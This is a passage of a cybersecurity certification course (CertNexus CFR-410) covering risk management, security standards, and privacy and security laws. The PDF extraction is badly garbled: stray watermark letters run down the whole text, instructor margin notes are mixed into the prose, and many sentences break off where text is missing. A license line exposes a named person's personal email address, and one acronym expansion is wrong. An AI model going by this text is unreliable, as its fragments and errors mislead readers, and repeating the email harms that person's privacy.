CFR 410 PDF
CFR 410 PDF
CFR 410 PDF
ut
CyberSec First
ib
tr
Responder®
is
(Exam CFR-410)
D
or
e
at
lic
up
D
ot
N
o
D
e
ut
Part Number: CNX0013
Course Edition: 1.0
ib
Acknowledgements
tr
PROJECT TEAM
is
Author Contributing Author Media Designer Content Editor
D
Jason Nufryk, CFR Belton Myers, CFR Brian J. Sullivan Geoff Graser
CertNexus wishes to thank Stacey McBrine, Al Wills, and members of the Logical Operations Instructor Community for their
or
instructional and technical expertise during the creation of this course.
Notices
e
DISCLAIMER
at
While CertNexus, Inc. takes care to ensure the accuracy and quality of these materials, we cannot guarantee their accuracy, and all
materials are provided without any warranty whatsoever, including, but not limited to, the implied warranties of merchantability or
fitness for a particular purpose. The name used in the data files for this course is that of a fictitious company. Any resemblance to
lic
current or future companies is purely coincidental. We do not believe we have used anyone's name in creating this course, but if we
have, please notify us and we will change the name in the next revision of the course. CertNexus is an independent provider of
integrated training solutions for individuals, businesses, educational institutions, and government agencies. The use of screenshots,
photographs of another entity's products, or another entity's product name or service in this book is for editorial purposes only. No
up
such use should be construed to imply sponsorship or endorsement of the book by nor any affiliation of such entity with CertNexus.
This courseware may contain links to sites on the Internet that are owned and operated by third parties (the "External Sites").
CertNexus is not responsible for the availability of, or the content located on or through, any External Site. Please contact
CertNexus if you have any concerns regarding such links or External Sites.
D
TRADEMARK NOTICES
ot
CertNexus and the CertNexus logo are trademarks of CertNexus, Inc. and its affiliates.
® ®
Microsoft Windows is a registered trademark of Microsoft Corporation in the United States and other countries. Kali Linux™ is a
trademark of Offensive Security in the United States and other countries. All other product and service names used may be
common law or registered trademarks of their respective proprietors.
N
Copyright © 2021 CertNexus, Inc. All rights reserved. Screenshots used for illustrative purposes are the property of the software
proprietor. This publication, or any part thereof, may not be reproduced or transmitted in any form or by any means, electronic or
mechanical, including photocopying, recording, storage in an information retrieval system, or otherwise, without express written
o
permission of CertNexus, 3535 Winton Place, Rochester, NY 14623, 1-800-326-8724 in the United States and Canada,
1-585-350-7000 in all other countries. CertNexus' World Wide Web site is located at www.certnexus.com.
D
This book conveys no rights in the software or other products about which it was written; all use or licensing of such software or
other products is the responsibility of the user according to terms and conditions of the owner. Do not make illegal copies of books
or software. If you believe that this book, related materials, or any other CertNexus materials are being reproduced or transmitted
without permission, please call 1-800-326-8724 in the United States and Canada, 1-585-350-7000 in all other countries.
e
ut
CFR-410)
ib
tr
is
D
Lesson 1: Assessing Cybersecurity Risk.......................... 1
or
Topic A: Identify the Importance of Risk Management.................... 2
Topic B: Assess Risk..................................................................... 10
e
Topic C: Mitigate Risk...................................................................23
at
e
Topic F: Assess the Impact of Threats to Mobile Security...................... 168
ut
Topic G: Assess the Impact of Threats to Cloud Security.......................173
ib
Lesson 5: Analyzing Post-Attack Techniques...................... 179
tr
Topic A: Assess Command and Control Techniques..............................180
is
Topic B: Assess Persistence Techniques................................................187
Topic C: Assess Lateral Movement and Pivoting Techniques................. 191
D
Topic D: Assess Data Exfiltration Techniques....................................... 202
or
Topic E: Assess Anti-Forensics Techniques.......................................... 209
e
Lesson 6: Assessing the Organization's Security Posture.....217
at
Platform........................................................................................... 272
Topic B: Collect Data from Network-Based Intelligence Sources............286
N
e
ut
Lesson 10: Responding to Cybersecurity Incidents..............391
Topic A: Deploy an Incident Handling and Response Architecture......... 392
ib
Topic B: Mitigate Incidents................................................................... 407
tr
Topic C: Hand Over Incident Information to a Forensic Investigation ....425
is
Lesson 11: Investigating Cybersecurity Incidents................ 429
D
Topic A: Apply a Forensic Investigation Plan......................................... 430
or
Topic B: Securely Collect and Analyze Electronic Evidence.....................443
Topic C: Follow Up on the Results of an Investigation........................... 460
e
at
Solutions............................................................................................ 481
D
Glossary............................................................................................. 509
ot
Index.................................................................................................. 529
N
o
D
| Table of Contents |
Licensed For Use Only By: Watuthanthirige Chirath De Alwis chirathdealwis@gmail.com M
e
ut
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D
e
ut
ib
This course covers network defense and incident response methods, tactics, and procedures
that are in alignment with industry frameworks such as NIST SP 800-61r2 (Computer Security
tr
Incident Handling Guide), US-CERT's National Cyber Incident Response Plan (NCIRP), and
Presidential Policy Directive (PPD)-41 on Cyber Incident Coordination. It is ideal for
is
candidates who have been tasked with the responsibility of monitoring and detecting
security incidents in information systems and networks, and for executing standardized
responses to such incidents. The course introduces tools, tactics, and procedures to manage
D
cybersecurity risks, defend cybersecurity assets, identify various types of common threats,
evaluate the organization's security, collect and analyze cybersecurity intelligence, and
remediate and report incidents as they occur. This course provides a comprehensive
organization. or
methodology for individuals responsible for defending the cybersecurity of their
This course is designed to assist students in preparing for the CertNexus CyberSec First
e
Responder (Exam CFR-410) certification examination. What you learn and practice in this
course can be a significant part of your preparation.
at
In addition, this course and subsequent certification (CFR-410) meet all requirements for
personnel requiring DoD directive 8570.01-M and directive 8140 position certification
lic
baselines:
• CSSP Analyst
• CSSP Infrastructure Support
up
Course Description
o
Target Student
This course is designed primarily for cybersecurity practitioners preparing for or who
D
currently perform job functions related to protecting information systems by ensuring their
availability, integrity, authentication, confidentiality, and non-repudiation. It is ideal for
those roles within federal contracting companies and private sector firms whose mission or
strategic objectives require the execution of Defensive Cyber Operations (DCO) or DoD
Information Network (DoDIN) operation and incident handling. This course focuses on
the knowledge, ability, and skills necessary to provide for the defense of those information
Course Prerequisites
To ensure your success in this course, you should meet the following requirements:
• At least two years (recommended) of experience or education in computer network security
e
technology or a related field.
• The ability or curiosity to recognize information security vulnerabilities and threats in the context
ut
of risk management.
• Foundational knowledge of the concepts and operational framework of common assurance
ib
safeguards in network environments. Safeguards include, but are not limited to, firewalls,
intrusion prevention systems, and VPNs.
• General knowledge of the concepts and operational framework of common assurance safeguards
tr
in computing environments. Safeguards include, but are not limited to, basic authentication and
authorization, resource permissions, and anti-malware mechanisms.
is
• Foundation-level skills with some of the common operating systems for computing
environments.
D
• Entry-level understanding of some of the common concepts for network environments, such as
routing and switching.
• General or practical knowledge of major TCP/IP networking protocols, including, but not
or
limited to, TCP, IP, UDP, DNS, HTTP, ARP, ICMP, and DHCP.
Course Objectives
e
In this course, you will identify, assess, respond to, and protect against security threats and operate a
system and network security analysis platform.
at
You will:
• Assess cybersecurity risks to the organization.
lic
Login and access information for your CHOICE environment will be provided with your class
experience. The CHOICE platform is your entry point to the CHOICE learning experience, of
D
• eBook: An interactive electronic version of the printed book for your course.
• Files: Any course files available to download.
• Checklists: Step-by-step procedures and general guidelines you can use as a reference during
and after class.
• Assessment: A course assessment for your self-assessment of the course content.
• Social media resources that enable you to collaborate with others in the learning community
using professional communications sites, such as LinkedIn, or microblogging tools, such as
Twitter.
e
Depending on the nature of your course and the components chosen by your learning provider, the
CHOICE Course screen may also include access to elements such as:
ut
• LogicalLABS, a virtual technical environment for your course.
• Various partner resources related to the courseware.
ib
• Related certifications or credentials.
• A link to your training provider's website.
tr
• Notices from the CHOICE administrator.
• Newsletters and other communications from your learning provider.
is
• Mentoring services.
Visit your CHOICE Home screen often to connect, communicate, and extend your learning
D
experience!
content. Each topic has various types of activities designed to enable you to solidify your
understanding of the informational material presented in the course. Information is provided for
lic
course files may contain media components to enhance your learning and additional reference
materials for use both during and after the course.
Checklists of procedures and guidelines can be used during class and as after-class references when
D
instructional components of the book. In many electronic versions of the book, you can click links
on key words in the content to move to the associated glossary definition, and on page references in
the index to move to that term in the content. To return to the previous location in the document
N
after clicking a link, use the appropriate functionality in your PDF viewing software.
As You Review
o
Any method of instruction is only as effective as the time and effort you, the student, are willing to
D
invest in it. In addition, some of the information that you learn in class may not be important to you
immediately, but it may become important later. For this reason, we encourage you to spend some
time reviewing the content of the course after your time in the classroom.
As a Reference
The organization and layout of this book make it an easy-to-use resource for future reference.
Taking advantage of the glossary, index, and table of contents, you can use this book as a first
source of definitions, background information, and summaries.
Course Icons
Watch throughout the material for the following visual cues.
Icon Description
e
A Note provides additional information, guidance, or hints about a topic or task.
ut
A Caution note makes you aware of places where you need to be particularly careful
ib
with your actions, settings, or decisions so that you can be sure to get the desired
results of an activity or task.
tr
Checklists provide job aids you can use after class as a reference to perform skills
back on the job. Access checklists from your CHOICE Course screen.
is
Social notes remind you to check your CHOICE Course screen for opportunities to
interact with the CHOICE community using social media.
D
or
e
at
lic
up
D
ot
N
o
D
e
ut
Lesson Time: 3 hours
ib
tr
is
Lesson Introduction
D
As a security professional, you are familiar with the ways in which information is vulnerable
to theft, destruction, alteration, and unavailability. But good security is not just a process of
or
reacting to individual threats when they appear or closing holes when they are discovered—
it's a process of understanding how your information, by its very nature and the ways in
which it is used, is at risk of being compromised. When you understand the risks you face
from a foundational level, you can better prepare yourself to reduce or eliminate the chances
e
of a security incident occurring and the impact it will have on your information.
at
Lesson Objectives
lic
TOPIC A
Identify the Importance of Risk Management
In our highly connected world, technology accelerates exponentially, granting newer and faster ways
for human beings to work with information. With this rapid growth, it is inevitable that threats to
our information advance just the same. The significance of security in modern information systems
e
cannot be overstated.
ut
Cybersecurity
ib
Elements of
Cybersecurity (Endpoint
Model)
tr
Elements of
Cybersecurity (Perimeter
is
Model)
Consider contrasting the
D
endpoint model (mall)
image with the perimeter
model (castle) image.
Securing endpoint
access is a more up-to-
date model that
addresses the
challenges of remote
or
e
access and
telecommuting. The
at
perimeter model is an
older style that
automatically distrusts
lic
inside.
you will encounter various common terms that have special meaning.
Term Description
N
Threat Any event or action that could potentially cause damage to an asset or
D
interruption of services.
Attack The intentional act of attempting to bypass one or more security services
or controls of an information system.
Vulnerability A condition that leaves the system and its assets open to harm—including
such things as software bugs, insecure passwords, inadequate physical
security, and poorly designed networks.
Term Description
Exploit A technique that takes advantage of a vulnerability to perform an attack.
Exploit may also refer to a packaged form of the technique, such as an
application or script that automates the technique so even an unskilled
attacker can use the exploit to perform an attack.
Control A countermeasure that you put in place to avoid, mitigate, or counteract
security risks due to threats or attacks.
e
The Risk Equation
ut
As a cybersecurity professional, your responsibility is to identify risks and protect your systems from The Risk Equation
them. In this context, risk is a measure of your exposure to the chance of damage or loss. It signifies
ib
the likelihood of a hazard or dangerous threat to occur. Risk is often associated with the loss of a
system, power, or network, and other physical losses. However, risk also affects people, practices,
tr
and processes.
Although there seem to be unlimited possibilities and variations when it comes to attacks, the time
is
and resources you can devote to securing an asset are unfortunately limited. You must determine
how to deal with various risks when you plan your asset security, which is a process called risk
D
management. To effectively manage risk, you need to consider the factors inherent in the risks you
are dealing with.
Risk is often considered to be composed of three factors, as expressed in the following formula: The term "consequence"
• A consequence, also called an impact, is damage that occurs because the threat took advantage of instead of
the vulnerability. There are technical impacts as well as business impacts, and the former usually "consequences."
leads to the latter. These consequences
lic
here.
D
ot
N
o
D
In the example in the figure, an attacker tricks an inexperienced user (the vulnerability) into installing
ransomware (the threat) on their workstation, encrypting the data on the workstation as well as any
mapped network shares, making the data unreadable (the technical consequence). If the organization
has no backups of the data, it may be gone forever and impossible to reconstruct; if such data is
mission critical, the organization may lose its competitive advantage. Stakeholders in the
organization then lose confidence, and may be less likely to continue supporting the organization.
Risk Management
Risk Management By estimating the extent of the three factors comprising risk, you can determine the extent of the
risk, which will guide your decision on how to deal with it. For example, even though a particular
vulnerability is easy to take advantage of and the threat of someone taking advantage of it is high, if
e
the consequences are trivial or non-existent, then you might deem the risk to be acceptable and
ut
prevention measures to be unnecessary. On the other hand, if the vulnerability and threat are low
but the consequences are quite high, you might deem the risk to be unacceptable, and choose to
spend time and effort to implement safeguards.
ib
You may not be in a position to make all the decisions regarding risk management. Such decisions
may be made by business stakeholders or a project management team. However, you may be in a
tr
unique position to understand where certain technical risks exist and need to bring them to the
attention of decision makers.
is
The reason why risk is managed rather than outright eliminated is because risk is not always in
opposition to an organization's goals. In fact, if you tried to eliminate risk altogether, the
organization would cease to function. You'd be completely disconnected, you wouldn't be able to
D
use any electronic devices, and operations would grind to a halt. That's why risk management is a
process of understanding what risks you can take, as long as the reward is worth the risk.
process is not meant to end; as long as information exists, it will need protecting. Therefore, risk
management recurs indefinitely so that you may, at all times, keep your information as secure as
lic
possible.
Without risk management, your security will be passive; and when you secure your information
passively, it will be at the mercy of the quickly changing tides of technological advancement.
up
Consider informing
students there are
several other ways to
D
analysis together.
N
o
D
Risk Exposure
Risk exposure is the property that dictates how susceptible an organization is to loss. When Risk Exposure
quantified, risk exposure is usually defined by multiplying the probability that an incident will occur
by the expected impact or loss if it does occur. For example, if you expect the likelihood of
ransomware wiping out your critical data to be 10%, and you estimate that the loss of such data
would cost the organization $100,000, then your risk exposure is .10 × 100,000 = $10,000. Of
course, this assumes that such a risk can be neatly quantified.
An organization exposes itself to risk in every action it takes. These actions occur during the process Qualitative vs.
e
of an organization conducting business, and the constant need for assessing those risks has given quantitative risk analysis
is discussed shortly.
ut
rise to the security industry as a whole. Without risk, there would be no need for security, as there
would be no consequences to poorly executed business processes. Since businesses are highly
dependent on the latest technologies, an increasing amount of risks involve cybersecurity
ib
professionals as the primary means to manage those risks.
Through risk management, an organization can keep its risk exposure low, but it can never really
avoid it entirely. This is why it is so critical for security professionals to constantly be vigilant for the
tr
elements of risk—including threats, attacks, and vulnerabilities—that have the potential to cause
harm to the organization's assets. Ignoring your organization's exposure to risk will limit its ability to
is
survive in any industry.
D
Risk Analysis Methods
Cybersecurity professionals conduct risk analysis to determine how to protect devices, networks, Risk Analysis Methods
or
information, and other assets to minimize damage to the organization. The style of the content and
output of any risk analysis must reflect the framework and jurisdiction within which the organization
is operating. For example, within the UK, risk analysis undertaken for a government or as part of
The National Institute of
Standards and
Technology (NIST)
includes only qualitative
e
government contracts must present the outputs in business language. In contrast, if risk analysis is
being undertaken as part of an ISO 27000 certification, then no such constraint exists apart from the and quantitative risk
at
likelihood and consequences of risks being communicated and understood. analysis methods in SP
800-30.
The risk analysis methods used to calculate for exposure can fall into one of three categories.
lic
Method Description
Qualitative Qualitative analysis methods use descriptions and words to measure the
up
likelihood and impact of risk. For example, impact ratings can be severe/
high, moderate/medium, or low; and likelihood ratings can be likely,
unlikely, or rare.
D
Method Description
Semi-quantitative A semi-quantitative analysis method exists because it's impossible for a
purely quantitative risk assessment to exist given that some issues defy
numbers. For example, how much is your employee morale worth in
terms of dollars? What is your corporate reputation worth?
A semi-quantitative analysis attempts to find a middle ground between
the previous two risk analysis types to create a hybrid method.
e
The Impact of Risks on the Organization
ut
The Impact of Risks on As an information assurance professional, you're likely to face risk in many different forms. Before
ib
the Organization you can even begin to mitigate risks, you need to know where they exist within your organization
Ask students if they can and identify how they can cause harm. The following table categorizes various types of risk that you
think of any other types may encounter in your organization. Keep in mind that risks are not necessarily technical, but can be
tr
of risk that may affect articulated in business terms.
their organization.
is
Risk Type Description and Impact
Legal Every organization, no matter the industry, must comply with certain laws
D
and regulations to stay within legal boundaries. For example, customer
protection laws are put in place by most governments that penalize
organizations that engage in activities that defraud the consumer.
or
Other unethical business practices, unscrupulous employees, and
negligent management can all place your organization in jeopardy. If the
organization is not in compliance, it may be served with a notification
e
first, and more severe penalties could follow if the issue is not addressed
in a sufficient and timely manner. The organization cannot only run afoul
at
Financial Your organization likely has expected revenue and profit margins based
on a number of calculations, and many different threats can cause your
up
Physical assets Depending on your organization's size, you may have a great deal of
valuable physical property stored in various company sites. Any physical
o
e
extremely difficult or even impossible to recover. Sophisticated data
ut
exfiltration techniques can also make it difficult for you to even spot a
breach of your intellectual property in the first place.
Infrastructure An organization must depend on its infrastructure to function at
ib
maximum efficiency. Whether physical or abstract, the frameworks that
hold an organization together are vulnerable to a number of threats. This
tr
is particularly true of any infrastructure that supplies power or facilitates
transportation.
is
Infrastructure risk affects the business at its foundational level.
Operations Day-to-day operations are what keep your organization running and
D
fulfilling not just its monetary expectations, but also its vision. Even if
there are no immediate financial consequences, the organization risks
losing its foothold in the marketplace, and its products or services may no
or
longer be viable. Especially damaging are risks that impact the
organization's operational capacity (i.e., its ability to execute many
business processes at once).
e
Likewise, operational risks can have an impact on the time that personnel
or other assets spend on addressing the effects of the risk—time that
at
Health Whether it's your employees or the customers they work with, people are
at risk of harm as a result of your operations. Although high-risk
industries like law enforcement have obvious health concerns, even
o
ACTIVITY 1-1
Identifying the Importance of Risk Management
Scenario
e
You are a member of the cybersecurity team at Develetech Industries, a manufacturer of home
electronics located in the fictitious city and state of Greene City, Richland (RL). The CEO has
ut
recently placed you in charge of maintaining your company's security in the face of a wide variety of
threats that target every dimension of your operations.
ib
Before you can dive into the diverse and complex world of cybersecurity, you need to develop your
organizational security strategies following the principle of risk management. When you can identify
just how risk can negatively affect your organization, you'll be able to convince your employer, team,
tr
and the rest of your employees of the importance of managing that risk.
is
Activity: Identifying the
Importance of Risk
Management 1. Develetech, a relatively large electronics manufacturer, is looking to expand
D
its business domestically and internationally over the next couple of years.
This may include everything from taking on new staff to establishing additional
offices and warehouses.
or
Why would these changes necessitate the re-evaluation of a risk
management strategy?
e
A: Answers will vary, but significant changes can bring about risk in many different ways. It may
at
become more challenging to secure sensitive information and keep it out of unauthorized hands,
or it may simply require more resources to secure more at-risk areas. Managing risk to information
and systems will help your organization avoid legal and financial disasters. Additionally, there will
lic
be pressure from stakeholders, customers, and regulatory entities to conform to their expectations
and meet standardization requirements. There is also the chance that an increase in the amount
of communications in the organization will exponentially increase the amount of risk that these
communication channels take on. You need to make sure changes to your organization can
up
2. What are the specific types of risk that could affect Develetech as it expands
D
its business?
A: Answers will vary, as there are many potential risks. Additional offices and warehouses will require
an infrastructure overhaul, which will require a reevaluation of infrastructural integrity. Certain
ot
physical assets, including computers and networking equipment, may not be able to sustain an
increase in operational capacity. More personnel may increase the risk of a safety incident. Failing
to understand and adhere to laws and regulations, especially when moving operations into a
N
foreign country, may create legality issues for the organization. Financially, a security breach
could cost the organization a great deal, and its reputation may suffer as a result. There may also
be potential issues with the supply chain, which can have operational impacts on the business.
o
D
3. You've identified a risk to the availability of your file servers at peak traffic
hours.
What risk analysis method would you prefer to use to determine Develetech's
risk exposure in this area, and why?
A: Answers will vary, but most organizations choose a combination of both quantitative and
qualitative analysis methods with an emphasis one way or the other. When it comes to risk, there
is not necessarily an objectively right answer. Quantitative analysis tends to be more precise, but
it's also expensive and not always feasible; qualitative analysis tends to be faster and cheaper,
e
but it's not always useful. Semi-quantitative analysis may be able to leverage the strengths of both
while minimizing their weaknesses. In any case, you may need more information about a situation
ut
before the best approach becomes obvious.
ib
tr
is
D
or
e
at
lic
up
D
ot
N
o
D
TOPIC B
Assess Risk
Now that you've identified the importance of risk management, you can begin the management
process by assessing how risk will impact your organization. For any organization, there are many
different elements of normal business operations that may affect its risk profile. Being able to
e
identify how these elements are relevant to your organization's security will prevent you from
missing crucial information when the time comes to mitigate risk.
ut
Security Standards and Frameworks
ib
Security Standards and The cybersecurity industry has many different standards and frameworks that can help an
Frameworks (2 Slides) organization define its cybersecurity goals and how to achieve those goals. Many of these standards
tr
Each of the documents and frameworks address risk specifically, or they are at least relevant to risk management indirectly.
mentioned in this topic In particular, you can use these documents to help guide your risk assessment practices.
is
could fill an entire
course. Ensure students
The following table briefly describes some of the most common standards and frameworks that
focus on cybersecurity.
D
understand they're being
given a high-level
overview of them, not an Standard or Framework Description
in-depth tour.
Consider asking
students if they
understand the
distinction between
NIST Cybersecurity Framework
orThe National Institute of Standards and Technology
(NIST), a non-regulatory agency of the United States
government, publishes numerous documents on a wide
range of security topics. The Cybersecurity Framework, first
e
standards and published in 2014, is a unified framework that provides
frameworks vs. laws and
at
2012, is version 2.
D
e
Approach for Security and Privacy, and SP 800-53, Security and
Privacy Controls for Information Systems and Organizations.
ut
COBIT Control Objectives for Information and Related Technology
(COBIT), created by ISACA®, provides a framework for IT
ib
management and governance. It promotes five principles:
meeting stakeholder needs; covering the organization end to
end; applying a single, integrated framework; enabling a
tr
holistic approach; and separating governance from
management. The most recent version is COBIT 2019.
is
ITAF The Information Technology Assurance Framework
(ITAF™), also published by ISACA, focuses primarily on
D
auditing. ITAF provides guidance for the roles and
responsibilities of auditors, as well as guidance for the
overall audit process and how to incorporate risk assessment
RFC 2196 Titled Site Security Handbook, this Request for Comments
(RFC) publication provides guidance on securing sites that
have Internet-connected systems. The publication includes
N
CIS Controls The Center for Internet Security (CIS) lists 18 general
D
e
Commission (IEC).
NERC 1300
ut
This is a standard first published in 2004 by the North
American Electric Reliability Corporation (NERC) for the
security of bulk electric systems (BESs), which the NERC
ib
defines as any "transmission element" that operates at 100
kilovolts (kV) or higher and "real power" and "reactive
power" resources connected at 100 kV or higher. Essentially,
tr
this standard applies to hardware and software components
that may support or interface with certain electrical systems.
is
SSAE 18 The Statement on Standards for Attestation Engagements
no. 18 is an auditing standard published in 2018 by the
D
American Institute of Certified Public Accountants
(AICPA). It is primarily focused on assuring that financial
reporting is accurate and complete, and can be applied to
OWASP
e
Although not technically a framework or standard, the Open Web Application Security Project
at
(OWASP) is a community effort that provides free access to a number of secure programming
resources and best practices. The most prominent of OWASP's resources is their Top 10 Project,
lic
which lists the most significant risks to web apps in a particular calender year. The latest Top 10 was
published in 2017.
The Cloud Security Alliance (CSA) is another organization that exists to promote best practices in
cybersecurity, particularly when it comes to cloud computing. The CSA is a coalition of several
member organizations, including Google™, Microsoft®, Huawei®, Oracle®, and more. The CSA
D
has several working groups that research cloud security topics for both providers and consumers,
including education and training, tools, processes, and defensive strategies.
ot
Security Laws and Standards, frameworks, and best practices are optional for the organization to follow, though they
Regulations are a great help to the risk assessment process. However, there are various laws and regulations an
organization is required to follow that also have an impact on risk assessment.
o
The following table lists some of the major laws and industry regulations that you may need to
D
comply with.
SOX The Sarbanes–Oxley Act (SOX) of 2002 is a U.S. law that dictates
requirements for the storage and retention of documents relating to an
organization's financial and business operations, including the type of
documents to be stored and their retention periods. It is relevant for any
publicly traded company with a market value of at least $75 million.
FISMA The Federal Information Security Management Act (FISMA) of 2002 was
passed in the United States to address the evolutionary nature of
e
information systems security in the federal government. Some of the act's
ut
key provisions require federal organizations to:
• Define the boundaries of the systems to be protected and then
identify the types of information found within those systems.
ib
• Document system information and perform a risk assessment to
identify areas requiring additional protection.
tr
• Protect systems using an identified set of controls and certify systems
before use. An approval for operation is issued upon certification.
is
• Continuously monitor systems for proper operation.
FISMA was amended in 2014 to bolster the federal government's ability
D
to respond to attacks on its departments and agencies.
CMMC The Cybersecurity Model Maturity Certification is a framework
announced in 2019 for training, assessing, and certifying organizations
or
that contract with the U.S. government. Such organizations must be
certified by a third party as having met the cybersecurity standards set
forth by the Department of Defense (DoD) and an accreditation board of
e
security professionals. Although the CMMC program is currently a DoD-
specific requirement, it may eventually be mandatory for all government
at
offenses are:
• Unauthorized access to computer material.
• Unauthorized access with intent to commit or facilitate commission of
D
further offenses.
• Unauthorized modification of computer material.
ot
Privacy and security are intertwined, as the former depends on the latter. Still, privacy concerns are Privacy Standards and
sometimes broken out into their own category for the sake of focusing on issues that affect the Frameworks
secrecy of personal data. The following table describes some standards and frameworks that focus
o
e
"Profile," and "Tiers" sections. The first and latest version
ut
was published in 2020.
ISO/IEC 27000 series Although much of the ISO/IEC 27000 series is relevant to
protecting data privacy, there are several publications that
ib
focus on data privacy specifically, including ISO/IEC
27018, ISO/IEC TS 27110, ISO/IEC 27701, and ISO
tr
27799.
ISO/IEC 29100 The 29100 standard, Information technology — Security techniques
is
— Privacy framework outlines common terminology for
privacy, the roles and responsibilities of those involved in
D
protecting privacy, controls for safeguarding privacy, and
references to known best practices for privacy.
The most recent version was published in 2011, though it
GAPP
or
was last reviewed and confirmed in 2017.
Generally Accepted Privacy Principles (GAPP) was a joint
effort by the AICPA and the Canadian Institute of
e
Chartered Accountants (CICA)—now the Chartered
at
guidance to both public and private organizations regarding data privacy for consumers. For
example, the publication Start with Security: A Guide for Business outlines general best practices for
upholding the privacy of user data. The FTC also promotes best practices in specific contexts, like
N
Privacy Laws and The following table describes major laws and regulations that have a focus on data privacy.
Regulations
HIPAA The Health Insurance Portability and Accountability Act (HIPAA) was
enacted in 1996 to establish several rules and regulations regarding
healthcare in the United States. With the rise of electronic medical
records, HIPAA standards have been implemented to protect the privacy
of patient medical information through restricted access to medical
records and regulations for sharing medical records.
GLBA The Gramm–Leach–Bliley Act (GLBA) of 1999 was primarily passed as a
e
deregulation of banks in the United States, but also instituted
ut
requirements that help protect the privacy of an individual's financial
information that is held by financial institutions and others, such as tax
preparation companies. The privacy standards and rules created as part of
ib
GLBA safeguard private information and set penalties in the event of a
violation. GLBA also requires a coherent risk management and
information security process.
tr
COPPA The Children's Online Privacy Protection Act (COPPA) is a U.S. federal
is
law passed in 1998 that stipulates what actions a website operator must
take to protect the personal data of children under the age of 13. This
includes displaying a privacy policy, obtaining consent from the child's
D
parent or guardian, and securing personal data in both storage and use.
COPPA also applies to children outside the U.S. if the organization that
handles their data is based in the U.S.
CAN-SPAM or
The Controlling the Assault of Non-Solicited Pornography and Marketing
(CAN-SPAM) Act is a U.S. federal law passed in 2003 that sets rules for
entities sending commercial email. There are several rules that prohibit
e
the spread of false or misleading information in email headers, deceptive
subject lines, and messages that don't properly self-identify as
at
not compromised.
D
e
The GDPR ultimately upholds the privacy rights of individuals (e.g., the
ut
right to correct inaccurate personal data), enforces restrictions and
security obligations for organizations (e.g., report data breaches within 72
hours), and issues penalties for non-compliance (e.g., fines up to €20
ib
million or 4 percent of global turnover).
PCI DSS The Payment Card Industry Data Security Standard (PCI DSS) is a
tr
proprietary standard that specifies how organizations should handle
information security for major card brands that include Visa, MasterCard,
is
American Express, Discover, and JCB (formerly Japan Credit Bureau), all
of which provide a mandate for the standard.
D
The standard is intended to increase controls on cardholder data to
reduce fraudulent use of accounts. Although not technically a law or
regulation, organizations or merchants that accept, transmit, or store
or
cardholder data (regardless of size or number of transactions) must
comply with this standard or face penalties.
Factors That Impact rate. Likewise, the risks to those industries change just as quickly. As you assess risk in your
Risk organization, you should consider various factors that may have changed or will soon change that
could have an impact on your efforts.
• New and changing business strategies. As the world changes, it brings about new forms of
D
doing business. Today's interconnected world offers rich opportunities for companies to partner
with other organizations, outsource their operations, rely on cloud providers for support, and
merge and demerge assets with other business entities.
ot
Examples of de-perimeterization include remote work, reliance on cloud services and other
outsourcing opportunities, and the bring your own device (BYOD) phenomenon.
• User behaviors. Users often present the largest risk to an organization. Users have access to
o
data, are usually not as technically savvy as systems administrators or security personnel, and are
frequently targeted by attackers through the use of social engineering methods. In a world of
D
remote work and online collaboration, users will change how they interact with each other and
the organization’s resources.
• New productions and technologies. As new products are used by an organization, new
vulnerabilities and threats are introduced, which increases risk. Similar to new products, new
technologies must be evaluated for vulnerabilities and threats, but one technology might have
markedly different risks from another. For example, mobile computing platforms like tablets and
smartphones suffer from similar risks to traditional desktops, such as buffer overflows, yet have
new risks, such as the ease of loss due to their small size and mobility.
• New threats. Attackers are constantly inventing new attacks, and how organizations conduct
business is always changing. This cycle of recurring change introduces new threats into an
organization, and thus new risks. For example, if a new weakness is found in an encryption
protocol such as Secure Sockets Layer/Transport Layer Security (SSL/TLS), the
organization will need to determine how to patch its systems or mitigate the threat in another
way.
e
Internal and External Influences
ut
Many different types of events influence risk. Some of these influences are internal and some are Internal and External
external to the organization. You should assess how each influence aids or detracts from the risk Influences
ib
management process.
tr
Internal compliance Internally, all the employees of an organization are stakeholders
is
concerned with the safety and security of the organization. When senior
management signs off on a risk management plan, everyone should be
expected to assist with its implementation; that is, be in compliance with
D
the plan. This is not always easy to do, as a great deal of training may be
required and numerous policies and procedures may be put in place to
ensure full compliance.
or
When done properly, internal compliance assessments can identify
controls that are not operating as intended and are not reducing the risk
to acceptable levels. Since internal users bring a high degree of risk to an
e
organization's network and systems, including them in your assessment of
risk will produce more accurate results. After all, they are the ones who
at
access and use those systems on a daily basis and can help identify areas
where additional risk treatment is necessary.
lic
External compliance All businesses must comply with external regulatory entities. It is
important that your organization follows all applicable laws, regulations,
and standards. The federal government will, for example, enforce HIPAA
up
deployed within the organization. This is why simply being compliant will
not necessarily produce an optimum risk assessment. Your organization
may be compliant but still may not be as secure as it should be under the
o
Internal client Internal clients are often stakeholders in risk management planning and
requirements implementation because they are direct users of corporate resources.
Internal clients should be involved in risk assessment, as they are at the
forefront of recognizing risks that impact the organization. If they are not
involved, it will be impossible to secure their environments, which in turn
will lead to client dissatisfaction and reduced customer business.
e
source of supply can continue in the event of a loss. They might also
ut
insist on measures that protect the confidentiality they share with their
trading partners. Because of this vested interest, external clients can
provide insight on the ways to assess risk in an organization that has
ib
business relationships.
Audit findings Audit findings influence risk by providing evidence that controls are
tr
adequate in reducing or eliminating risk. Where an auditor's results are
below acceptable thresholds, the organization should assess the risk and
is
determine if mitigation, transfer, or acceptance is the correct approach.
In some cases, it is impossible to reduce risk further; for example, where
D
the use of legacy systems is required as part of an established business
function. In cases such as this, it may be necessary to change the business
process or outsource the function entirely to avoid the risk. Likewise, it
Top-level
management
or
may be necessary to rethink your technology infrastructure.
Top-level management is one of the key stakeholders in the risk
assessment process. Without proper risk assessment, they will be unable
e
to make informed decisions about how to operate the business. When
presenting both internal and external risk to executive management,
at
quantitative analysis and accurate metrics are two of the key components
that you must communicate effectively. When this is done, it will be easier
for you to get buy-in from executive management for risk mitigation
lic
and expand customer markets. All of these activities bring their own risk
to the organization.
D
System-Specific Risk To understand the risks to an organization, a security professional must be able to analyze the
Analysis organization's systems to understand how those systems are used and how the confidentiality,
Consider asking integrity, and availability (CIA) of the systems are threatened. A number of different frameworks
N
students which and processes have been established to assist this analysis. Although how you go about your analysis
questions are most will differ with respect to what you're analyzing, the following are some common questions to ask
important to them. when trying to quantify a risk:
o
• Can the attack be performed in the current network, and are the assets accessible?
• Can the requirement for authentication reduce the possibility of attack?
• What is the potential impact to the confidentiality, integrity, and availability of the data?
• How exploitable is the flaw? Is it theoretical or does a working exploit exist?
• Are there workarounds or patches available?
